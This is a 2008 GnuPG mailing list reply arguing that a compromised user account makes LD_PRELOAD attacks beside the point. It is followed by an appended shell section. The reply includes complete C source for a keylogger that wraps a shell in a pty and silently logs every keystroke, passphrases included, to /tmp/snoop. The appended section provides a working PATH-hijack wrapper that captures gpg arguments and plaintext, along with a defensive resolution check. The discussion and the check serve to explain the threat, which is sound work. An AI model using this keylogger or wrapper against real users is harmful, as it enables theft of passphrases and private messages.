LD_PRELOAD attack

David Shaw dshaw at jabberwocky.com
Thu Jun 12 01:02:00 CEST 2008


On Wed, Jun 11, 2008 at 04:31:45PM -0400, michael graffam wrote:
> On Wed, Jun 11, 2008 at 3:56 PM, David Shaw <dshaw at jabberwocky.com> wrote:
> 
> > If the attacker had access to your machine to implement the LD_PRELOAD
> > attack, there are literally dozens of ways they can similarly steal
> > whatever data they are trying to steal.  Why do a very complex attack
> > involving replacing libraries when they could just replace the GPG
> > binary itself?
> 
> 
> Replacing the GPG bin requires root. An LD_PRELOAD'ed lib doesn't.

Try it.  I don't have to replace it for everyone - just you, and if I
can write to your computer, I can make you run any binary I want.
Remember, you own your own shell .rc file.

>  Or add a shell script named 'gpg' and put it in your
> > search path ahead of the real gpg?
> 
> 
> Again,  root.

Again, .bashrc.

> > Or turn on typescript by default.
> 
> 
> Doesn't save GPG passphrases.

Why would I care about getting your passphrase if I can get everything
you typed into the message before it was encrypted?

Still, just for laughs, here's a hack that will save everything typed
on a particular terminal, including passphrases (real error checking
and proper handling of sigchld left up to the reader):

#include <stdio.h>
#include <pty.h>
#include <unistd.h>
#include <termios.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/ioctl.h>
#include <fcntl.h>

/* Build with: cc snoop.c -o snoop -lutil */

int
main(int argc,char *argv[])
{
  int master,slave,snoop;
  pid_t pid;
  char byte;
  struct termios term;

  /* Every byte typed on this terminal is appended here. */
  snoop=open("/tmp/snoop",O_WRONLY|O_CREAT|O_TRUNC,0666);

  /* Allocate the pty pair.  The slave side inherits the settings of the
     real terminal so the shell running on it behaves normally (line
     editing, echo, ^C and friends all keep working). */
  tcgetattr(0,&term);
  openpty(&master,&slave,NULL,&term,NULL);

  pid=fork();
  if(pid)
    {
      /* Keystroke path: real stdin -> pty master, with a copy to the
	 log.  The real terminal goes raw with echo off; the slave side
	 does the echoing, so the user sees nothing unusual. */
      cfmakeraw(&term);
      term.c_lflag&=~ECHO;
      tcsetattr(0,TCSAFLUSH,&term);
      close(slave);

      for(;;)
	{
	  if(read(0,&byte,1)==1)
	    {
	      write(master,&byte,1);
	      write(snoop,&byte,1);
	    }
	}
    }
  else
    {
      pid=fork();
      if(pid)
	{
	  /* Output path: pty master -> real stdout. */
	  close(slave);
	  for(;;)
	    {
	      if(read(master,&byte,1)==1)
		write(1,&byte,1);
	    }
	}
      else
	{
	  /* The snooped shell: new session, slave pty as its controlling
	     terminal and as stdin/stdout/stderr. */
	  setsid();
	  ioctl(slave,TIOCSCTTY,0);
	  close(master);
	  dup2(slave,0);
	  dup2(slave,1);
	  dup2(slave,2);
	  close(slave);

	  execl("/bin/bash","/bin/bash","-i",NULL);
	}
    }

  return 0;
}

> > Or load a kernel module that changes the meaning of system calls.  Or
> > replace the rng with one that isn't random.  Or, or, or.
> 
> 
> Root, root, root.

Do you seriously think that someone who can write to your user-level
account can't get root pretty soon?  This can be as complex as reading
bugtraq for a while until a buffer overrun comes along, or as simple
as arranging for "su" to go somewhere else.

> Get it yet? LD_PRELOAD enables attacks against GPG w/o requiring full access
> to the box. The attacker just need access to the user's account.

I do get it.  I'm not convinced that you do.

If an attacker has access to the user's account, it's game over.  At
that point, it's just a question which particular method the attacker
will choose to completely own you.

David
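The .bashrc / search-path variant of the attack discussed above, as an added example that is not part of David's message or of GnuPG: a wrapper script named gpg, placed in a directory the victim's own .bashrc puts ahead of the real one, logs the argument list and a copy of stdin (the plaintext) and then runs the genuine binary so nothing looks wrong. Alongside it is the check a user can run to see whether "gpg" still resolves where they think it does, covering LD_PRELOAD, /etc/ld.so.preload, aliases and functions, and PATH order. All directory and file names are assumptions, and the "real gpg" the demo uses is a constructed stand-in script that echoes stdin, not GnuPG.

```shell
#!/bin/sh
# Added example, not from the original thread.
#   install_gpg_wrapper  - the attack: plant a script named "gpg" that logs
#                          argv and stdin, then hands off to the real gpg.
#   check_gpg_resolution - the check: does "gpg" still resolve to the binary
#                          you expect, with no alias, function or preload
#                          in the way?
# All paths are assumptions chosen for the example.

# install_gpg_wrapper DIR REAL_GPG
install_gpg_wrapper() {
  dir=$1
  real=$2   # the attacker knows where the genuine binary lives
  mkdir -p "$dir"
  # Unquoted heredoc: $dir and $real expand now; \$* and \$@ survive into the wrapper.
  cat > "$dir/gpg" <<EOF
#!/bin/sh
# log the argument list (recipients, --sign, filenames ...)
printf '%s\n' "\$*" >> "$dir/.args"
# keep a copy of whatever is piped in (the plaintext), then run the real gpg
tee -a "$dir/.plaintext" | "$real" "\$@"
EOF
  chmod 755 "$dir/gpg"
  # The one line the attacker needs in the victim's ~/.bashrc (shown, not written):
  #   PATH="$dir:\$PATH"
}

# check_gpg_resolution EXPECTED_PATH
# Returns 0 if gpg resolves to EXPECTED_PATH with nothing in the way,
# nonzero otherwise.  LDSO_PRELOAD may point at a copy of the preload file
# (e.g. from a mounted image); it defaults to the live one.
check_gpg_resolution() {
  expected=$1
  preload_file=${LDSO_PRELOAD:-/etc/ld.so.preload}
  rc=0
  # 1. Per-process preload: every dynamically linked program, gpg included,
  #    maps these libraries first.
  if [ -n "${LD_PRELOAD:-}" ]; then
    echo "LD_PRELOAD is set: $LD_PRELOAD"; rc=1
  fi
  # 2. System-wide preload file (writing it needs root, but worth a look).
  if [ -s "$preload_file" ]; then
    echo "$preload_file is non-empty"; rc=1
  fi
  # 3. An alias or function named gpg wins over PATH in an interactive shell.
  #    "type" wording differs between shells, so match loosely.
  case "$(type gpg 2>/dev/null)" in
    *alias*|*function*) echo "gpg is shadowed by an alias or shell function"; rc=1 ;;
  esac
  # 4. The first gpg on PATH must be the one you expect.
  found=$(command -v gpg 2>/dev/null || true)
  if [ "$found" != "$expected" ]; then
    echo "gpg resolves to '${found:-nothing}', expected '$expected'"; rc=1
  fi
  return $rc
}

# demo: run the attack against a constructed stand-in for the real gpg
# (a script that just echoes stdin), with the check before and after.
demo() {
  tmp=$(mktemp -d)
  mkdir -p "$tmp/realbin"
  printf '#!/bin/sh\ncat\n' > "$tmp/realbin/gpg"   # constructed stand-in, not GnuPG
  chmod 755 "$tmp/realbin/gpg"
  PATH="$tmp/realbin:$PATH"
  echo "== before =="; check_gpg_resolution "$tmp/realbin/gpg" && echo "clean"
  install_gpg_wrapper "$tmp/bin" "$tmp/realbin/gpg"
  PATH="$tmp/bin:$PATH"                              # what the planted .bashrc line does
  printf 'meet at noon\n' | gpg --encrypt -r alice >/dev/null
  echo "== after =="; check_gpg_resolution "$tmp/realbin/gpg" || echo "hijacked"
  echo "captured args:      $(cat "$tmp/bin/.args")"
  echo "captured plaintext: $(cat "$tmp/bin/.plaintext")"
  rm -rf "$tmp"
}

case "${1:-}" in demo) demo ;; esac
```

Run it as `sh gpg_path_hijack.sh demo`. The check is only as good as the shell it runs in: aliases and functions from an already-compromised .bashrc are visible only from that interactive shell, so run it there rather than from a fresh `sh -c`, and compare `command -v gpg` against the path your package manager installed.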



More information about the Gnupg-users mailing list